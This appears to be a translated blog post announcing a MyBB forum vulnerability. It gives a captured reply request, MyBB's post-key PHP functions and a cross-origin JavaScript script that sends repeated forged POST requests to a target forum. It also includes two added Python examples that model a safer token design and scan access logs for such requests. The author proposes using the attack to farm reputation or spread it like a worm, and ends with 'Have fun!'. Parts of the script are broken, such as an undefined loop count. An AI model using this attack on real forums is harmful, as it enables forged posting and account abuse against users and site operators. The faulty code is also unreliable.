MyBB 0-day vulnerability in well-known Forum Systems

Source: Internet
Author: User
Tags: forum software

MyBB is an excellent free forum system. Its biggest selling point is its simplicity, yet its functionality is surprisingly powerful. It supports multiple languages: the frontend and backend languages can be set separately, and each user can choose the language in which they browse the forum, along with their own time zone. Its customization features are powerful enough to avoid unexpected problems. The vulnerability affects multiple versions.

Affected versions: 1.6.x and 1.8.x. Tested on 1.8.3 (latest) and 1.6.16 (latest of the 1.6 series).

Because of its wide adoption, I started playing with MyBB and monitoring its requests. During this I noticed something very likely to cause a vulnerability; it has been tested on multiple sites.

Test process

First, MyBB is easy to break. When you submit a new post, it sends a request. The following is an example of a reply request captured from the Hackforums forum:

POST http://www.hackforums.net/newreply.php?tid=4602700&processed=1 HTTP/1.1
Host: www.hackforums.net
User-Agent: Mozilla/5.0 (Windows NT 5.3; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.hackforums.net/newreply.php?tid=4602700
Cookie: *
Connection: keep-alive
Content-Type: multipart/form-data; boundary=------71842462512788
Content-Length: 1588

------71842462512788
Content-Disposition: form-data; name="my_post_key"

******
------71842462512788
Content-Disposition: form-data; name="message_new"

Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="message"

Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="submit"

Post Reply
------71842462512788
Content-Disposition: form-data; name="action"

do_newreply
------71842462512788
Content-Disposition: form-data; name="replyto"


------71842462512788
Content-Disposition: form-data; name="posthash"

******
------71842462512788
Content-Disposition: form-data; name="attachmentaid"


------71842462512788
Content-Disposition: form-data; name="attachmentact"


------71842462512788
Content-Disposition: form-data; name="subject"

*
------71842462512788
Content-Disposition: form-data; name="quoted_ids"


------71842462512788
Content-Disposition: form-data; name="tid"

4602700
------71842462512788--

For MyBB we already know some of these fields. The first is the post key; without it we cannot submit any post. Getting this key is very easy, and we will explain it in detail later. Next we need posthash. posthash is just an MD5 string, and any well-formed MD5 string is accepted. I can tell you this is because of placeholders, but that is not something we will discuss today.

Look at the message_new and message fields. MyBB submits both, but it only displays the content of the message field, not the content of message_new. Therefore you can put whatever you like in the message_new field of the previous post; of course, nothing in the displayed post will reveal any difference from the previous one.

How to generate a post key

The post key depends on the following function:

function generate_post_check()
{
    global $mybb, $session;
    if($mybb->user['uid'])
    {
        // Logged-in users: the key is derived only from stored account fields
        return md5($mybb->user['loginkey'].$mybb->user['salt'].$mybb->user['regdate']);
    }
    // Guests get a special string
    else
    {
        return md5($session->useragent.$mybb->config['database']['username'].$mybb->settings['internal']['encryption_key']);
    }
}

Then the post key is verified by the following function:

function verify_post_check($code, $silent=false)
{
    global $lang;
    // The submitted code is compared with a freshly recomputed key
    if(generate_post_check() != $code)
    {
        if($silent == true)
        {
            return false;
        }
        else
        {
            if(defined("IN_ADMINCP"))
            {
                return false;
            }
            else
            {
                error($lang->invalid_post_code);
            }
        }
    }
    else
    {
        return true;
    }
}

So we can see that it uses the loginkey, salt, and regdate values. Obtaining this information is quite easy (I don't want to explain it in detail; it really is easy). Once we have the post key it stays usable as long as it is available and the user has not changed their password (currently, most forum users rarely change their password).
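As an added example that is not part of the original post or MyBB's own code, the following Python models the derivation above beside a per-session token design, so the property the text relies on (the key is recomputable from stored fields and only retired by a loginkey change) can be checked rather than taken on faith. The sample user record and the issue/verify helpers for the hardened variant are assumptions.

```python
import hashlib
import hmac
import secrets

def mybb_style_post_check(user):
    """Model of generate_post_check() for a logged-in user: md5(loginkey . salt . regdate)."""
    return hashlib.md5((user["loginkey"] + user["salt"] + user["regdate"]).encode()).hexdigest()

def mybb_style_verify(user, code):
    # Same shape as verify_post_check(): the code is checked against a value recomputed
    # from stored user fields, so nothing ties it to the session that submits it.
    return mybb_style_post_check(user) == code

def issue_session_token(session):
    """Hardened variant (an assumed design, not MyBB's): a random token kept only in this session."""
    session["post_token"] = secrets.token_hex(16)
    return session["post_token"]

def verify_session_token(session, code):
    expected = session.get("post_token")
    return expected is not None and hmac.compare_digest(expected, code)

# Constructed sample record; not real credentials.
USER = {"loginkey": "k3y-example", "salt": "s4lt", "regdate": "1420070400"}

def compare_designs():
    """Compute, rather than assert by hand, the properties of both designs on the sample user."""
    key = mybb_style_post_check(USER)
    rotated = dict(USER, loginkey="new-k3y")   # per the text, only a password change (new loginkey) retires the key
    sess_a, sess_b = {}, {}
    tok_a, tok_b = issue_session_token(sess_a), issue_session_token(sess_b)
    return {
        "derived_key_passes_from_fields": mybb_style_verify(USER, key),
        "derived_key_retired_by_loginkey_change": not mybb_style_verify(rotated, key),
        "session_tokens_differ": tok_a != tok_b,
        "session_token_bound": verify_session_token(sess_a, tok_a) and not verify_session_token(sess_a, tok_b),
    }
```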

Okay, now we can start the attack. First we need to pick an attack target (I set up a site on my local machine). Then I write a CORS script, and when the user clicks a URL in the browser it issues the post request; once the request reaches the other end, the URL is processed without any message being shown. Assuming you have constructed a valid request, you will see the change on the web page.

How to Use

Different requests can be constructed depending on what you need. This can be used to submit posts and collect forum reputation. If you want this vulnerability to behave like a worm, all you need to do is post a reply under the post (this takes more effort, since you need the post key). Honestly, the impact may be very high!

CORS code

Note: this is only the sample code from appsec-labs. You will need to modify it to suit your attack targets:

// I suggest adding jQuery to top of file
// You will have to modify the code to make it more useable as I won't be modifying it for you.
var url = 'http://forum.mytarget.com/';

$(document).ready(function() {
    corsMyBBPost();
});

function corsMyBBPost() {
    for (i = 0; i < times; i++) {
        cors_send("post", url + "?proof_of_concept=1&req_num=" + i, "post=data", false);
    }
}

function cors_send(method, url, data, credentials) {
    var cors;
    if (window.XDomainRequest) {
        cors = new XDomainRequest();
        if (cors) {
            cors.onprogress = function() { CORSstatus("Process") };
            cors.onload = function() { CORSresult(cors.responseText) };
        }
        else
            CORSstatus("Browser does not support Cross Origin Request");
    }
    else if (window.XMLHttpRequest) {
        cors = new XMLHttpRequest();
        cors.onreadystatechange = function() {
            if (cors.readyState == 4)
                CORSresult(cors.getAllResponseHeaders(), cors.responseText);
            else
                CORSstatus("Process");
        }
    }
    else {
        CORSstatus("Browser does not support AJAX");
    }
    method = method.toUpperCase();
    if (method == "POST" || method == "PUT")
        cors.open(method, url, data);
    else
        cors.open(method, url);
    if (credentials)
        cors.withCredentials = "true";
    cors.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    cors.send(data);
    CORSstatus("Cross Origin Resource Sharing - Start");
}

function CORSstatus(msg) { console.log(msg); }
function CORSerror(msg) { console.log("Oh shit..." + msg); }

Even without any modification, the code is very concise. I will not describe how to steal the post key here; if you understand it, that is your own business.
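As an added example from the forum operator's side (not the page's or MyBB's code), the following Python scans access-log lines in the common "combined" format for the two traces the script above leaves: posting requests whose Referer is not the forum itself, and a burst of posting requests from one address, as produced by the loop in corsMyBBPost(). The forum hostname, the burst threshold and the log lines are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

FORUM_HOST = "forum.example.test"    # assumed forum hostname (placeholder)
POST_ENDPOINTS = {"/newreply.php", "/newthread.php"}
BURST_N, BURST_SECS = 3, 10           # assumed: 3+ posting POSTs from one IP within 10 s
# Apache/nginx "combined" format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def is_cross_origin(rec):
    """Referer absent or on another host: the PoC's XHR fires from a page the forum did not serve."""
    ref_host = urlsplit(rec["referer"]).hostname if rec["referer"] != "-" else None
    return ref_host != FORUM_HOST

def find_suspicious(lines):
    """Return (ips posting cross-origin, ips bursting the posting endpoints), both sorted."""
    cross, stamps = set(), defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or urlsplit(rec["path"]).path not in POST_ENDPOINTS:
            continue
        stamps[rec["ip"]].append(rec["ts"])
        if is_cross_origin(rec):
            cross.add(rec["ip"])
    bursts = set()
    for ip, ts in stamps.items():
        ts.sort()  # any BURST_N consecutive posts spanning <= BURST_SECS count as a burst
        if any((ts[i + BURST_N - 1] - ts[i]).total_seconds() <= BURST_SECS
               for i in range(len(ts) - BURST_N + 1)):
            bursts.add(ip)
    return sorted(cross), sorted(bursts)

# Constructed sample lines; hosts and addresses are documentation values, not real servers.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2015:12:00:01 +0000] "POST /newreply.php?tid=1&processed=1 HTTP/1.1" 302 0 "http://forum.example.test/newreply.php?tid=1" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2015:12:00:02 +0000] "POST /newreply.php?tid=1&processed=1 HTTP/1.1" 302 0 "http://evil.example.test/poc.html" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2015:12:00:03 +0000] "POST /newreply.php?tid=1&processed=1 HTTP/1.1" 302 0 "http://evil.example.test/poc.html" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2015:12:00:04 +0000] "POST /newreply.php?tid=1&processed=1 HTTP/1.1" 302 0 "http://evil.example.test/poc.html" "Mozilla/5.0"',
]
```

The combined format does not record the Origin header that a cross-origin XMLHttpRequest carries; a server configured to log it gives a cleaner signal than Referer, which browsers may strip.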

Finally, I hope you can learn more from it.

The most important thing is: Have fun!
